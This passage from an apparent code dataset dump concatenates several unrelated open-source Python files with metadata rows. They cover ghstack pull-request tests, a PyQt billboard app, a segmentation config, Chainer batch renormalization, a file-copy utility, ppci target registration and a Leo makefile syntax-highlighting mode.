self.github.patch("repos/pytorch/pytorch/pulls/500",
body="Directly updated message body",
title="Directly updated title")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Directly updated message body
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Force update fields")
self.gh('Update 1', update_fields=True)
self.sh.test_tick()
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_update_fields_preserve_differential_revision(self) -> None:
# Check that Differential Revision is preserved
logging.info("### test_update_fields_preserve_differential_revision")
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nOriginal message")
self.sh.test_tick()
self.gh('Initial 1')
self.sh.test_tick()
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
logging.info("### Amend the PR")
body = """\n
Directly updated message body
Differential Revision: [D14778507](https://our.internmc.facebook.com/intern/diff/D14778507)
"""
self.github.patch("repos/pytorch/pytorch/pulls/500",
body=body,
title="Directly updated title")
self.assertExpected(self.dump_github(), '''\
#500 Directly updated title (gh/ezyang/1/head -> gh/ezyang/1/base)
Directly updated message body
Differential Revision: [D14778507](https://our.internmc.facebook.com/intern/diff/D14778507)
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
logging.info("### Force update fields")
self.gh('Update 1', update_fields=True)
self.sh.test_tick()
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
Original message
Differential Revision: [D14778507](https://our.internmc.facebook.com/intern/diff/D14778507)
* rMRG1 Commit 1
Repository state:
* rMRG1 (gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_remove_bottom_commit(self) -> None:
# This is to test a bug where we decided not to update base,
# but this was wrong
self.sh.git("checkout", "-b", "feature")
print("###")
print("### First commit")
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
print("###")
print("### Second commit")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Commit 2\n\nA commit with a B")
self.sh.test_tick()
self.gh('Initial 2')
self.substituteRev("HEAD", "rCOM2")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
* #500 Commit 1
A commit with a B
* rMRG2 Commit 2
Repository state:
* rMRG2 (gh/ezyang/2/head) Commit 2
* rMRG1 (gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
print("###")
print("### Delete first commit")
self.sh.git("checkout", "master")
print("###")
print("### Cherry-pick the second commit")
self.sh.git("cherry-pick", "feature")
self.substituteRev("HEAD", "rCOM2A")
self.gh('Cherry pick')
self.substituteRev("origin/gh/ezyang/2/base", "rINI2A")
self.substituteRev("origin/gh/ezyang/2/head", "rMRG2A")
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 2
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 2 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 2**
A commit with a B
* rMRG2 Commit 2
* rMRG2A Cherry pick on "Commit 2"
Repository state:
* rMRG2A (gh/ezyang/2/head) Cherry pick on "Commit 2"
|\\
| * rINI2A (gh/ezyang/2/base) Update base for Cherry pick on "Commit 2"
| |\\
* | | rMRG2 Commit 2
|/ /
* | rMRG1 (gh/ezyang/1/head) Commit 1
|/
* rINI0 (HEAD -> master, gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_short(self) -> None:
self.writeFileAndAdd("b", "asdf")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
with captured_output() as (out, err):
self.gh('Initial', short=True)
self.assertEqual(out.getvalue(), "https://github.com/pytorch/pytorch/pull/500\n")
# ------------------------------------------------------------------------- #
"""
def test_land_ff(self) -> None:
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.gh_land()
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* **#500 Commit 1**
This is my first commit
* 3f14b96 Commit 1
Repository state:
* 3f14b96 (gh/ezyang/1/head) Commit 1
* rINI0 (gh/ezyang/1/base) Initial commit
''')
# ------------------------------------------------------------------------- #
def test_land_non_ff(self) -> None:
with self.sh.open("file1.txt", "w") as f:
f.write("A")
self.sh.git("add", "file1.txt")
self.sh.git("commit", "-m", "Commit 1\n\nThis is my first commit")
self.sh.test_tick()
self.gh('Initial')
self.substituteRev("HEAD", "rCOM1")
self.sh.git("reset", "--hard", "origin/master")
with self.sh.open("file2.txt", "w") as f:
f.write("B")
self.sh.git("add", "file2.txt")
self.sh.git("commit", "-m", "Upstream commit")
self.substituteRev("HEAD", "rUP1")
self.sh.git("push")
self.sh.git("checkout", "gh/ezyang/1/orig")
self.gh_land()
self.substituteRev("origin/master", "rUP2")
self.assertExpected(self.upstream_sh.git("log", "--oneline", "master"), '''\
rUP2 Commit 1
rUP1 Upstream commit
rINI0 Initial commit''')
"""
# ------------------------------------------------------------------------- #
def test_unlink(self) -> None:
print("###")
print("### First commit")
self.writeFileAndAdd("file1.txt", "A")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an A")
self.sh.test_tick()
self.writeFileAndAdd("file2.txt", "B")
self.sh.git("commit", "-m", "Commit 1\n\nA commit with an B")
self.sh.test_tick()
self.gh('Initial 1')
self.substituteRev("HEAD", "rCOM1")
self.substituteRev("origin/gh/ezyang/1/head", "rMRG1")
# Unlink
self.gh_unlink()
self.gh('Initial 2')
self.assertExpected(self.dump_github(), '''\
#500 Commit 1 (gh/ezyang/1/head -> gh/ezyang/1/base)
Stack:
* #501 Commit 1
* **#500 Commit 1**
A commit with an A
* rMRG1 Commit 1
#501 Commit 1 (gh/ezyang/2/head -> gh/ezyang/2/base)
Stack:
* **#501 Commit 1**
* #500 Commit 1
A commit with an B
* db38c32 Commit 1
#502 Commit 1 (gh/ezyang/3/head -> gh/ezyang/3/base)
Stack:
* #503 Commit 1
* **#502 Commit 1**
A commit with an A
* rMRG1 Commit 1
#503 Commit 1 (gh/ezyang/4/head -> gh/ezyang/4/base)
Stack:
* **#503 Commit 1**
* #502 Commit 1
A commit with an B
* db38c32 Commit 1
Repository state:
* db38c32 (gh/ezyang/4/head, gh/ezyang/2/head) Commit 1
* rMRG1 (gh/ezyang/4/base, gh/ezyang/3/head, gh/ezyang/2/base, gh/ezyang/1/head) Commit 1
* rINI0 (HEAD -> master, gh/ezyang/3/base, gh/ezyang/1/base) Initial commit
''')
# def load_tests(loader, tests, ignore):
# tests.addTests(doctest.DocTestSuite(gh))
# return tests
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format='%(message)s')
unittest.main()
| 27.607185 | 139 | 0.545022 |
d3a5607495bef8529749795e700e48b7bb9b6cd9 | 1,920 | py | Python | billboard/app.py | setrofim/billboard | acb7d3e0a26c1c42def85a96ec33cd895c8a7ead | ["BSD-3-Clause"] | 1 | 2018-08-01T13:03:22.000Z | 2018-08-01T13:03:22.000Z | billboard/app.py | setrofim/billboard | acb7d3e0a26c1c42def85a96ec33cd895c8a7ead | ["BSD-3-Clause"] | 2 | 2016-04-21T14:11:28.000Z | 2018-06-28T15:05:59.000Z | billboard/app.py | setrofim/billboard | acb7d3e0a26c1c42def85a96ec33cd895c8a7ead | ["BSD-3-Clause"] | 2 | 2017-02-26T17:30:11.000Z | 2018-06-29T15:35:14.000Z |
import os
import sys
import argparse
import signal
import tempfile
import logging
from PyQt4.QtGui import QApplication
from billboard.billboard import Billboard
from billboard.display import BillboardDisplay
from billboard.server import Server
from billboard.sources.reddit import RedditSource
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--period', type=int, default=60*15,
help='''
Period for switching billboard display in seconds.
Defaults to 15 minutes.
''')
parser.add_argument('-d', '--working-directory',
help='''
Working directory used by billboard. If not specified,
a temporary directory will be created.
''')
parser.add_argument('-P', '--port', type=int, default=5555,
help='''
Port to be used by the server.
''')
parser.add_argument('--debug', action='store_true')
return parser.parse_args(sys.argv[1:])
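# Editor's note: illustrative invocation only (flag values are arbitrary
# examples, not project defaults):
#   python -m billboard.app --period 600 --working-directory /tmp/billboard --port 5555 --debug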
def main():
signal.signal(signal.SIGINT, signal.SIG_DFL)
args = parse_args()
level = logging.DEBUG if args.debug else logging.INFO
logging.basicConfig(format='%(asctime)s %(levelname)-8s %(name)s: %(message)s', level=level)
app = QApplication(sys.argv)
workdir = os.path.abspath(args.working_directory or tempfile.mktemp())
if not os.path.isdir(workdir):
logging.debug('Creating {}'.format(workdir))
os.makedirs(workdir)
server = Server(workdir, args.port)
display = BillboardDisplay(workdir=workdir)
sources = [RedditSource()]
billboard = Billboard(display, sources, args.period)
billboard.start()
display.showFullScreen()
server.start()
app.exec_()
if __name__ == '__main__':
main()
| 29.538462 | 96 | 0.614063 |
e45c50cb815c85c6891c49a5bb267e0b6f87628d | 352 | py | Python | configs/deeplabv3/deeplabv3_r50a-d8_512x512_20k_sn6_sar_pro.py | yoyoyoohh/spacenet6 | 57829afb6a642d96c30c42434929080b6d927fb4 | ["Apache-2.0"] | null | null | null | configs/deeplabv3/deeplabv3_r50a-d8_512x512_20k_sn6_sar_pro.py | yoyoyoohh/spacenet6 | 57829afb6a642d96c30c42434929080b6d927fb4 | ["Apache-2.0"] | null | null | null | configs/deeplabv3/deeplabv3_r50a-d8_512x512_20k_sn6_sar_pro.py | yoyoyoohh/spacenet6 | 57829afb6a642d96c30c42434929080b6d927fb4 | ["Apache-2.0"] | null | null | null |
'''
Author: Shuailin Chen
Created Date: 2021-09-14
Last Modified: 2021-09-25
content:
'''
_base_ = [
'../_base_/models/deeplabv3_r50a-d8.py',
'../_base_/datasets/sn6_sar_pro.py', '../_base_/default_runtime.py',
'../_base_/schedules/schedule_20k.py'
]
model = dict(
decode_head=dict(num_classes=2), auxiliary_head=dict(num_classes=2))
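# Editor's note (illustration only): a composed config like this is normally
# consumed by an mmsegmentation-style launcher from the repository root, e.g.
#   python tools/train.py configs/deeplabv3/deeplabv3_r50a-d8_512x512_20k_sn6_sar_pro.py
# assuming the standard tools/train.py entry point is present in that checkout.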
| 25.142857 | 72 | 0.696023 |
0e179db186b5c9e67e4de1145e642ef8f6563b9c | 8,632 | py | Python | chainer/functions/normalization/batch_renormalization.py | takeratta/chainer | 02686e98cd6dc8f20979a1f3a79130f076cbfc6c | ["MIT"] | 2 | 2018-02-05T07:25:48.000Z | 2018-08-28T20:29:45.000Z | chainer/functions/normalization/batch_renormalization.py | takeratta/chainer | 02686e98cd6dc8f20979a1f3a79130f076cbfc6c | ["MIT"] | null | null | null | chainer/functions/normalization/batch_renormalization.py | takeratta/chainer | 02686e98cd6dc8f20979a1f3a79130f076cbfc6c | ["MIT"] | 1 | 2018-08-23T01:34:57.000Z | 2018-08-23T01:34:57.000Z |
import numpy
from chainer import configuration
from chainer import cuda
from chainer import function
from chainer.utils import type_check
def _as4darray(arr):
if arr.ndim == 0:
return arr.reshape(1, 1, 1, 1)
elif arr.ndim == 4:
return arr
else:
return arr.reshape(arr.shape[0], -1, 1, 1)
def _xhat(x, mean, std, expander):
x_mu = x - mean[expander]
x_mu /= std[expander]
return x_mu
class BatchRenormalizationFunction(function.Function):
def __init__(self, eps=2e-5, mean=None, var=None, decay=0.9,
rmax=1, dmax=0, freeze_running_statistics=False):
self.running_mean = mean
self.running_var = var
self.rmax = rmax
self.dmax = dmax
self.r = None
self.d = None
self.freeze_running_statistics = freeze_running_statistics
self.eps = eps
self.mean_cache = None
self.decay = decay
def check_type_forward(self, in_types):
n_in = type_check.eval(in_types.size())
if n_in != 3 and n_in != 5:
raise type_check.InvalidType(
'%s or %s' % (in_types.size() == 3, in_types.size() == 5),
'%s == %s' % (in_types.size(), n_in))
x_type, gamma_type, beta_type = in_types[:3]
M = type_check.eval(gamma_type.ndim)
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim >= gamma_type.ndim + 1,
x_type.shape[1:1 + M] == gamma_type.shape,
# TODO(tkerola): Check shape
gamma_type.dtype == x_type.dtype,
beta_type.dtype == x_type.dtype,
gamma_type.shape == beta_type.shape,
)
if len(in_types) == 5:
mean_type, var_type = in_types[3:]
type_check.expect(
mean_type.dtype == x_type.dtype,
mean_type.shape == gamma_type.shape,
var_type.dtype == x_type.dtype,
var_type.shape == gamma_type.shape,
)
def forward(self, inputs):
xp = cuda.get_array_module(*inputs)
x, gamma, beta = inputs[:3]
# Note: If length of inputs is not 5, we must be in train mode.
if len(inputs) != 5:
assert configuration.config.train
if configuration.config.train:
if self.running_mean is None:
self.running_mean = xp.zeros_like(gamma)
self.running_var = xp.zeros_like(gamma)
else:
self.running_mean = xp.array(self.running_mean)
self.running_var = xp.array(self.running_var)
elif len(inputs) == 5:
fixed_mean = inputs[3]
fixed_var = inputs[4]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
if configuration.config.train:
axis = (0,) + tuple(range(head_ndim, x.ndim))
mean = x.mean(axis=axis)
var = x.var(axis=axis) + self.eps
else:
mean = fixed_mean
var = fixed_var + self.eps
self.std = xp.sqrt(var, dtype=var.dtype)
if not self.freeze_running_statistics or self.r is None:
if configuration.config.train:
running_sigma = xp.sqrt(self.running_var + self.eps,
dtype=self.running_mean.dtype)
self.r = xp.clip(self.std / running_sigma,
1.0 / self.rmax, self.rmax)
self.d = xp.clip((mean - self.running_mean) / running_sigma,
-self.dmax, self.dmax)
# Update running statistics:
m = x.size // gamma[expander].size
self.running_mean *= self.decay
adjust = m / max(m - 1., 1.) # unbiased estimation
temp_ar = xp.array(mean)
temp_ar *= (1 - self.decay)
self.running_mean += temp_ar
del temp_ar
self.running_var *= self.decay
temp_ar = xp.array(var)
temp_ar *= (1 - self.decay) * adjust
self.running_var += temp_ar
del temp_ar
else:
self.r = xp.ones_like(gamma)
self.d = xp.zeros_like(gamma)
if self.freeze_running_statistics:
# Need to explicitly cast during gradient check, as r and d are
# not updated during finite differences
self.r = self.r.astype(gamma.dtype)
self.d = self.d.astype(gamma.dtype)
gamma = gamma[expander]
beta = beta[expander]
if xp is numpy:
self.x_hat = _xhat(x, mean, self.std, expander)
self.x_hat_renorm = self.x_hat * self.r[expander] + \
self.d[expander]
y = gamma * self.x_hat_renorm
y += beta
else:
self.x_hat, self.x_hat_renorm, y = cuda.elementwise(
'T x, T mean, T std, T gamma, T beta, T r, T d',
'T x_hat, T x_hat_renorm, T y',
'''
x_hat = (x - mean) / std;
x_hat_renorm = x_hat * r + d;
y = gamma * x_hat_renorm + beta;
''',
'bn_fwd')(x, mean[expander], self.std[expander], gamma,
beta, self.r[expander], self.d[expander])
return y,
def backward(self, inputs, grad_outputs):
x, gamma = inputs[:2]
gy = grad_outputs[0]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
m = gamma.dtype.type(x.size // gamma.size)
axis = (0,) + tuple(range(head_ndim, x.ndim))
xp = cuda.get_array_module(x)
if len(inputs) == 5:
# This case is unlikely to be used in practice and so does not
# need to be optimized for performance.
mean = inputs[3]
var = inputs[4]
std = xp.sqrt(var, dtype=var.dtype)
gs = gamma / std
gbeta = gy.sum(axis=axis)
x_hat = _xhat(x, mean, std, expander)
ggamma = (gy * x_hat).sum(axis=axis)
gmean = -gs * gbeta
gvar = -0.5 * gamma / var * ggamma
gx = gs[expander] * gy
return gx, ggamma, gbeta, gmean, gvar
# Note: If length of inputs is not 5, we must be in train mode.
assert configuration.config.train
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
gbeta = gy.sum(axis=axis)
ggamma = (gy * self.x_hat_renorm).sum(axis=axis)
gsigma_batch = (gy * self.x_hat).sum(axis=axis)
if xp is numpy:
scale = (self.r * gamma / self.std)[expander]
gx = scale * (gy - (self.x_hat * gsigma_batch[expander] +
gbeta[expander]) / m)
else:
inv_m = numpy.float32(1) / m
gx = cuda.elementwise(
'T gy, T x_hat, T gamma, T std, T gsigma_batch, T gbeta, \
T inv_m, T r',
'T gx',
'gx = (r * gamma / std) * (gy - (x_hat * gsigma_batch + gbeta) * \
inv_m)',
'bn_bwd')(gy, self.x_hat, gamma[expander],
self.std[expander], gsigma_batch[expander],
gbeta[expander], inv_m, self.r[expander])
return gx, ggamma, gbeta
def batch_renormalization(x, gamma, beta, rmax, dmax, eps=2e-5,
running_mean=None, running_var=None, decay=0.9):
"""Batch renormalization function.
This is an extension of batch normalization, which ensures that the
training and inference models generate the same outputs that depend on
individual examples rather than the entire minibatch.
See: `Batch Renormalization: Towards Reducing Minibatch Dependence in \
Batch-Normalized Models <https://arxiv.org/abs/1702.03275>`_
.. seealso:: :class:`links.BatchRenormalization`
.. seealso:: :func:`functions.BatchNormalization`
"""
return BatchRenormalizationFunction(eps, running_mean, running_var,
decay, rmax, dmax)(x, gamma, beta)
def fixed_batch_renormalization(x, gamma, beta, mean, var, eps=2e-5):
with configuration.using_config('train', False):
return BatchRenormalizationFunction(eps, None, None, 0.0)(
x, gamma, beta, mean, var)
| 38.19469 | 82 | 0.542632 |
2b18cdeebcb568cfd90558ce253bf78195162f62 | 4,450 | py | Python | branches/g3d-8.0-64ffmpeg-win/bin/ice/copyifnewer.py | brown-ccv/VRG3D | 0854348453ac150b27a8ae89024ef57360f15d45 | ["BSD-3-Clause"] | null | null | null | branches/g3d-8.0-64ffmpeg-win/bin/ice/copyifnewer.py | brown-ccv/VRG3D | 0854348453ac150b27a8ae89024ef57360f15d45 | ["BSD-3-Clause"] | null | null | null | branches/g3d-8.0-64ffmpeg-win/bin/ice/copyifnewer.py | brown-ccv/VRG3D | 0854348453ac150b27a8ae89024ef57360f15d45 | ["BSD-3-Clause"] | null | null | null |
# copyifnewer.py
#
#
import re, string
from utils import *
_excludeDirPatterns = \
['^\.',\
'^#',\
'~$',\
'^\.svn$',\
'^\.git$',\
'^CVS$', \
'^Debug$', \
'^Release$', \
'^graveyard$', \
'^tmp$', \
'^temp$', \
'^\.icompile-temp$', \
'^\.ice-tmp$', \
'^build$']
""" Regular expression patterns that will be excluded from copying by
copyIfNewer.
"""
_excludeFromCopyingPatterns =\
['\.ncb$', \
'\.opt$', \
'\.ilk$', \
'\.cvsignore$', \
'^\.\#', \
'\.pdb$', \
'\.bsc$', \
'^\.DS_store$', \
'\.o$', \
'\.pyc$', \
'\.obj$', \
'\.pyc$', \
'\.plg$', \
'^#.*#$', \
     '^ice-stats\.csv$', \
     '~$', \
     '\.old$', \
'^log.txt$', \
'^stderr.txt$', \
'^stdout.txt$', \
'\.log$', \
     '^\.cvsignore$'] + _excludeDirPatterns
"""
Regular expression patterns (i.e., directory and filename patterns) that are
excluded from the search for cpp files
"""
_cppExcludePatterns = ['^test$', '^tests$', '^#.*#$', '~$', '^old$'] + _excludeFromCopyingPatterns
"""
A regular expression matching files that should be excluded from copying.
"""
excludeFromCopying = re.compile(string.join(_excludeFromCopyingPatterns, '|'))
""" Linked list of the source names that were copied """
_copyIfNewerCopiedAnything = None
"""
Recursively copies all contents of source to dest
(including source itself) that are out of date. Does
not copy files matching the excludeFromCopying patterns.
Returns a list of the files (if any were copied)
If actuallyCopy is false, doesn't actually copy the files, but still prints.
"""
def copyIfNewer(source, dest, echoCommands = True, echoFilenames = True, actuallyCopy = True):
global _copyIfNewerCopiedAnything
_copyIfNewerCopiedAnything = []
if source == dest:
# Copying in place
return False
dest = removeTrailingSlash(dest)
if (not os.path.exists(source)):
# Source does not exist
return False
if (not os.path.isdir(source) and newer(source, dest)):
if echoCommands:
colorPrint('cp ' + source + ' ' + dest, COMMAND_COLOR)
elif echoFilenames:
print source
if actuallyCopy:
shutil.copyfile(source, dest)
_copyIfNewerCopiedAnything += [source]
else:
# Walk is a special iterator that visits all of the
# children and executes the 2nd argument on them.
os.path.walk(source, _copyIfNewerVisit,
[len(source), dest, echoCommands, echoFilenames, actuallyCopy])
if len(_copyIfNewerCopiedAnything) == 0 and echoCommands:
print dest + ' is up to date with ' + source
return _copyIfNewerCopiedAnything
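# Editor's note: illustrative call only (hypothetical paths, not part of the
# original module):
#   copied = copyIfNewer('source/data', 'install/data', echoCommands = False)
#   if copied:
#       print 'copied %d file(s)' % len(copied)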
#########################################################################
"""Helper for copyIfNewer.
args is a list of:
[length of the source prefix in sourceDirname,
rootDir of the destination tree,
echo commands
echo filenames]
"""
def _copyIfNewerVisit(args, sourceDirname, names):
global _copyIfNewerCopiedAnything
prefixLen = args[0]
# Construct the destination directory name
# by concatenating the root dir and source dir
destDirname = pathConcat(args[1], sourceDirname[prefixLen:])
dirName = betterbasename(destDirname)
echoCommands = args[2]
echoFilenames = args[3]
actuallyCopy = args[4]
if (excludeFromCopying.search(dirName) != None):
# Don't recurse into subdirectories of excluded directories
del names[:]
return
# Create the corresponding destination dir if necessary
if actuallyCopy:
mkdir(destDirname, echoCommands)
# Iterate through the contents of this directory
for name in names:
source = pathConcat(sourceDirname, name)
if ((excludeFromCopying.search(name) == None) and
(not os.path.isdir(source))):
# Copy files if newer
dest = pathConcat(destDirname, name)
if (newer(source, dest)):
if echoCommands:
colorPrint('cp ' + source + ' ' + dest, COMMAND_COLOR)
elif echoFilenames:
print name
_copyIfNewerCopiedAnything += [source]
if actuallyCopy:
shutil.copy(source, dest)
| 26.807229 | 98 | 0.577079 |
7ce9bb2076104e2c919ca2bace341dc0e69a68b0 | 1,059 | py | Python | ppci/arch/target_list.py | rakati/ppci-mirror | 8f5b0282fd1122d7c389b39c86fcf5d9352b7bb2 | ["BSD-2-Clause"] | null | null | null | ppci/arch/target_list.py | rakati/ppci-mirror | 8f5b0282fd1122d7c389b39c86fcf5d9352b7bb2 | ["BSD-2-Clause"] | null | null | null | ppci/arch/target_list.py | rakati/ppci-mirror | 8f5b0282fd1122d7c389b39c86fcf5d9352b7bb2 | ["BSD-2-Clause"] | 1 | 2021-11-23T14:23:04.000Z | 2021-11-23T14:23:04.000Z |
""" Contains a list of instantiated targets. """
from functools import lru_cache
from .arm import ArmArch
from .avr import AvrArch
from .example import ExampleArch
from .msp430 import Msp430Arch
from .x86_64 import X86_64Arch
from .m68k import M68kArch
from .mcs6500 import Mcs6500Arch
from .mips import MipsArch
from .microblaze import MicroBlazeArch
from .or1k import Or1kArch
from .riscv import RiscvArch
from .stm8 import Stm8Arch
from .xtensa import XtensaArch
target_classes = [
ArmArch,
AvrArch,
ExampleArch,
M68kArch,
Mcs6500Arch,
MicroBlazeArch,
MipsArch,
Msp430Arch,
Or1kArch,
RiscvArch,
Stm8Arch,
X86_64Arch,
XtensaArch,
]
target_class_map = {t.name: t for t in target_classes}
target_names = tuple(sorted(target_class_map.keys()))
@lru_cache(maxsize=30)
def create_arch(name, options=None):
""" Get a target architecture by its name. Possibly arch options can be
given.
"""
# Create the instance!
target = target_class_map[name](options=options)
return target
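# Editor's note: illustrative usage only. Any entry of ``target_names`` is a
# valid argument; repeated calls with the same name return the cached instance
# because of the ``lru_cache`` decorator above.
#   arch = create_arch(target_names[0])
#   same = create_arch(target_names[0])
#   assert arch is same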
| 22.0625 | 75 | 0.734655 |
b1a623842a392ffea61905da6c2dfa2e9ab44fbb | 7,439 | py | Python | leo/modes/makefile.py | ATikhonov2/leo-editor | 225aac990a9b2804aaa9dea29574d6e072e30474 | ["MIT"] | 1,550 | 2015-01-14T16:30:37.000Z | 2022-03-31T08:55:58.000Z | leo/modes/makefile.py | ATikhonov2/leo-editor | 225aac990a9b2804aaa9dea29574d6e072e30474 | ["MIT"] | 2,009 | 2015-01-13T16:28:52.000Z | 2022-03-31T18:21:48.000Z | leo/modes/makefile.py | ATikhonov2/leo-editor | 225aac990a9b2804aaa9dea29574d6e072e30474 | ["MIT"] | 200 | 2015-01-05T15:07:41.000Z | 2022-03-07T17:05:01.000Z |
# Leo colorizer control file for makefile mode.
# This file is in the public domain.
# Properties for makefile mode.
properties = {
"lineComment": "#",
}
# Attributes dict for makefile_main ruleset.
makefile_main_attributes_dict = {
"default": "null",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Attributes dict for makefile_variable ruleset.
makefile_variable_attributes_dict = {
"default": "KEYWORD2",
"digit_re": "",
"escape": "\\",
"highlight_digits": "true",
"ignore_case": "false",
"no_word_sep": "",
}
# Dictionary of attributes dictionaries for makefile mode.
attributesDictDict = {
"makefile_main": makefile_main_attributes_dict,
"makefile_variable": makefile_variable_attributes_dict,
}
# Keywords dict for makefile_main ruleset.
makefile_main_keywords_dict = {
"addprefix": "keyword1",
"addsuffix": "keyword1",
"basename": "keyword1",
"dir": "keyword1",
"filter": "keyword1",
"filter-out": "keyword1",
"findstring": "keyword1",
"firstword": "keyword1",
"foreach": "keyword1",
"join": "keyword1",
"notdir": "keyword1",
"origin": "keyword1",
"patsubst": "keyword1",
"shell": "keyword1",
"sort": "keyword1",
"strip": "keyword1",
"subst": "keyword1",
"suffix": "keyword1",
"wildcard": "keyword1",
"word": "keyword1",
"words": "keyword1",
}
# Keywords dict for makefile_variable ruleset.
makefile_variable_keywords_dict = {}
# Dictionary of keywords dictionaries for makefile mode.
keywordsDictDict = {
"makefile_main": makefile_main_keywords_dict,
"makefile_variable": makefile_variable_keywords_dict,
}
# Rules for makefile_main ruleset.
def makefile_rule0(colorer, s, i):
return colorer.match_eol_span(s, i, kind="comment1", seq="#",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="", exclude_match=False)
def makefile_rule1(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="$(", end=")",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule2(colorer, s, i):
return colorer.match_span(s, i, kind="keyword2", begin="${", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="makefile::variable",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule3(colorer, s, i):
return colorer.match_mark_following(s, i, kind="keyword2", pattern="$",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
def makefile_rule4(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule5(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule6(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="`", end="`",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def makefile_rule7(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="label", pattern=":",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
def makefile_rule8(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for makefile_main ruleset.
rulesDict1 = {
"\"": [makefile_rule4,],
"#": [makefile_rule0,],
"$": [makefile_rule1,makefile_rule2,makefile_rule3,],
"'": [makefile_rule5,],
"-": [makefile_rule8,],
"0": [makefile_rule8,],
"1": [makefile_rule8,],
"2": [makefile_rule8,],
"3": [makefile_rule8,],
"4": [makefile_rule8,],
"5": [makefile_rule8,],
"6": [makefile_rule8,],
"7": [makefile_rule8,],
"8": [makefile_rule8,],
"9": [makefile_rule8,],
":": [makefile_rule7,],
"@": [makefile_rule8,],
"A": [makefile_rule8,],
"B": [makefile_rule8,],
"C": [makefile_rule8,],
"D": [makefile_rule8,],
"E": [makefile_rule8,],
"F": [makefile_rule8,],
"G": [makefile_rule8,],
"H": [makefile_rule8,],
"I": [makefile_rule8,],
"J": [makefile_rule8,],
"K": [makefile_rule8,],
